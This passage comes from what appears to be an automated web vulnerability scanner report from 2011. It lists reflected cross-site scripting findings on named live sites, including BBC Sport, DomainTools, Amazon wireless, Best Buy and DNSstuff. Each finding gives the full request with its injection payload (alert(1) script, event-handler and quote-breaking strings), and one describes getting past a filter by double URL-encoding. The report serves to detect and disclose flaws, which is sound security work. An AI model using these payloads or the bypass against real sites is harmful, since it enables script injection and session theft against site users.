Date: Mon, 18 Jul 2011 02:20:11 GMT
Keep-Alive: timeout=5, max=799
Expires: Mon, 18 Jul 2011 02:20:11 GMT
Connection: close
Content-Length: 53360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955611000,
       editionToServe: 'international',
       queryString: 'b0774'-alert(1)-'96258bdb8b3=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.83. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3db0'-alert(1)-'d49f53f3de4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm?b3db0'-alert(1)-'d49f53f3de4=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:22 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:22 GMT
Connection: close
Content-Length: 48890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955622000,
       editionToServe: 'international',
       queryString: 'b3db0'-alert(1)-'d49f53f3de4=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.84. https://secure.domaintools.com/join/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2231d<a>d37eab15273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /join2231d<a>d37eab15273/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:18:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>d37eab15273">Whois record for "join2231d<a>d37eab15273"</a>
...[SNIP]...

3.85. https://secure.domaintools.com/join/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5126"><a>5636737d81b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joind5126"><a>5636737d81b/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=joind5126"><a>5636737d81b">
...[SNIP]...

3.86. https://secure.domaintools.com/log-in/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92168"><a>6a3fe2a15c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in92168"><a>6a3fe2a15c7/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=log-in92168"><a>6a3fe2a15c7">
...[SNIP]...

3.87. https://secure.domaintools.com/log-in/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d261<a>85e8fbdd7f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in6d261<a>85e8fbdd7f2/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>85e8fbdd7f2">Whois record for "log-in6d261<a>85e8fbdd7f2"</a>
...[SNIP]...

3.88. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f7922<a>15d716d7dbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /f7922<a>15d716d7dbb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>15d716d7dbb">Whois record for "f7922<a>15d716d7dbb"</a>
...[SNIP]...

3.89. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98306"><a>183c19664cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shopping-cart98306"><a>183c19664cb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=shopping-cart98306"><a>183c19664cb">
...[SNIP]...

3.90. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload ab504<script>alert(1)</script>dbf1c364134 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1310993870949-319721&mboxPC=1310569554435-90226.17&mboxPage=1310994092251-573687&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=3&user.profile=B2C&entity.id=5635&entity.categoryId=Phone%2CPhone%3AAllPhonesAndDevices&ContractPeriod=2Yr&entity.name=HTC%20Trophy%26amp%3Btrade%3B&entity.type=PDA%2FSmartPhones&entity.make=HTC&entity.model=Trophy%26amp%3Btrade%3B&entity.pageURL=%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26amp%3Baction%3DviewPhoneDetail%26amp%3BselectedPhoneId%3D5635&entity.thumbnailURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fphones%2Fmini%2Fhtc_trophy.png&entity.capabilities_96=false&entity.capabilities_147=false&entity.capabilities_150=true&entity.capabilities_193=false&entity.capabilities_194=false&entity.capabilities_198=false&entity.inventory=3435&entity.preorder=false&entity.ratings=4.6209&entity.reviews=306&entity.ratingURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fshared%2Freviews%2Fsm_star_4_5.png&path=phoneFirst&loggedin=false&planId=0&mbox=productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134&mboxId=0&mboxTime=1310976102252&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=39 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: mboxPC=1310569554435-90226.17; mboxSession=1310993870949-319721

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1310569554435-90226.17; Domain=verizonwireless.tt.omtrdc.net; Expires=Mon, 01-Aug-2011 13:03:24 GMT; Path=/m2/verizonwireless
Content-Type: text/javascript
Content-Length: 220
Date: Mon, 18 Jul 2011 13:03:24 GMT
Server: Test & Target

mboxFactories.get('default').get('productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1310569554435-90226.17");

3.91. http://wireless.amazon.com/alohaCartRequest [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wireless.amazon.com
Path:   /alohaCartRequest

Issue detail

The value of the zip request parameter is copied into the HTML document as plain text between tags. The payload 76487<img%20src%3da%20onerror%3dalert(1)>66af90f3644d32ac9 was submitted in the zip parameter. This input was echoed as 76487<img src=a onerror=alert(1)>66af90f3644d32ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /alohaCartRequest?appActionToken=mapUcj2FLhWDrJakFexAot1t0qYRQj3D&appAction=detailAction&asin=B00528E2JU&transaction=INDIVIDUAL_NEW&operation=ADD_DEVICE&zip=1001076487<img%20src%3da%20onerror%3dalert(1)>66af90f3644d32ac9&type=BUNDLE HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW
Cookie: session-id=179-2761153-4689763; session-id-time=1311598655l
Pragma: no-cache
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:01:37 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:01:37 GMT; Path=/
Set-Cookie: session-token="g5MNmYG+8nWRZ8LG+IOSp1IkH1q+UWtxSVVA/fYm/bDm2BUyDOn97BLd4HDfnpufFh49AwGKfEMoABAshxomL5aFUqZOZcNz/nR2T6GhnRlXI/pu+0O0wLh+f2AdMEo0+21WTNItbxbohlDmhXeiaJ2IZjWTiBh2uz5vqT604l5gYwuYwf25ruyU9JnoYaMwd9e4l/Qd3atVmxfVYWuPHg=="; Version=1; Domain=.amazon.com; Max-Age=600; Expires=Mon, 18-Jul-2011 13:11:37 GMT; Path=/
Content-Length: 1263


{"phoneBrowseNodeId":"/b/684177011","bundleBuildStates":[{"name":"SELECT_PLAN","url":"/b/684182011"}],"didInternalBundleChangeOccur":false,"compatibilityResult":{"isCompatible":false,"compatibilityMessage":"This phone is not available in ZIP Code 1001076487<img src=a onerror=alert(1)>66af90f3644d32ac9","compatibilityLink":"<a href=\"/b/684177011/ref=bb_br_ph_dp\">
...[SNIP]...

3.92. http://www.bestbuy.com/site/olstemplatemapper.jsp [_DARGS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bestbuy.com
Path:   /site/olstemplatemapper.jsp

Issue detail

The value of the _DARGS request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0316'-alert(1)-'cabc5e5b3d7 was submitted in the _DARGS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /site/olstemplatemapper.jsp?_DARGS=/site/en_US/catalog/browse/fragments/includes/olsmbpkgdevicetranspopup.jspc0316'-alert(1)-'cabc5e5b3d7 HTTP/1.1
Host: www.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17408&width=400&skuID=2330093&isCntrctSelect=false&productId=1218323066904&contractDesc=&TB_iframe=true&&type=page&documentType=mobile&parentPage=PDP&modal=true&keepThis=true&height=250
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; akaau=1310995660~id=1ba8cb2e676cea6446c2d3ded776fcfc; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993885945
Content-Type: application/x-www-form-urlencoded
Content-Length: 777

_dyncharset=ISO-8859-1&_dynSessConf=-189911339780467805&pspSkuId=&pspProductId=&parentSkuId=2330093&parentProductId=1218323066904&customerType=N&_D%3AcustomerType=+&_D%3AcustomerType=+&newRadio=cnt202
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
X-Powered-By:
Vary: Accept-Encoding
Expires: Mon, 18 Jul 2011 12:58:29 GMT
Pragma: no-cache
Date: Mon, 18 Jul 2011 12:58:29 GMT
Content-Length: 1398
Connection: close
Cache-Control: no-store

<!DOCTYPE html>
<!-- B:226 -->
<!-- B:005 -->
<!-- bbolsp-app05/dlpolsapp28-40-11-6 -->
<!-- E:005 -->
<!-- B:0OD -->
<!-- B:185 -->
<script>
var popupUrl='/site/olstemplatemapper.jsp?_DARGS=/site/en_US/catalog/browse/fragments/includes/olsmbpkgdevicetranspopup.jspc0316'-alert(1)-'cabc5e5b3d7';
</script>
...[SNIP]...

3.93. http://www.dnsstuff.com/tools/ipall/ [ip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The value of the ip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c187f"><img%20src%3da%20onerror%3dalert(1)>deb3acbb8a6 was submitted in the ip parameter. This input was echoed as c187f\"><img src=a onerror=alert(1)>deb3acbb8a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84c187f"><img%20src%3da%20onerror%3dalert(1)>deb3acbb8a6 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:04:46 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:04:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14129
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84c187f\"><img src=a onerror=alert(1)>deb3acbb8a6&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;deb3acbb8a6=">
...[SNIP]...

3.94. http://www.dnsstuff.com/tools/ipall/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11b31e10794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1cf0b\"><script>alert(1)</script>11b31e10794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84&1cf0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11b31e10794=1 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:06:13 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:06:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14122
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84&1cf0b%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e11b31e10794=1&1cf0b\"><script>alert(1)</script>11b31e10794=1">
...[SNIP]...

3.95. http://www.dnsstuff.com/tools/ipall/ [token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b50eb"><img%20src%3da%20onerror%3dalert(1)>c9e633bed88 was submitted in the token parameter. This input was echoed as b50eb\"><img src=a onerror=alert(1)>c9e633bed88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67&token=b50eb"><img%20src%3da%20onerror%3dalert(1)>c9e633bed88&toolhandler_redirect=0&ip=209.235.10.84 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:54 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:03:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=b50eb\"><img src=a onerror=alert(1)>c9e633bed88&toolhandler_redirect=0&ip=209.235.10.84&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;c9e633bed88=">
...[SNIP]...

3.96. http://www.dnsstuff.com/tools/ipall/ [tool_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

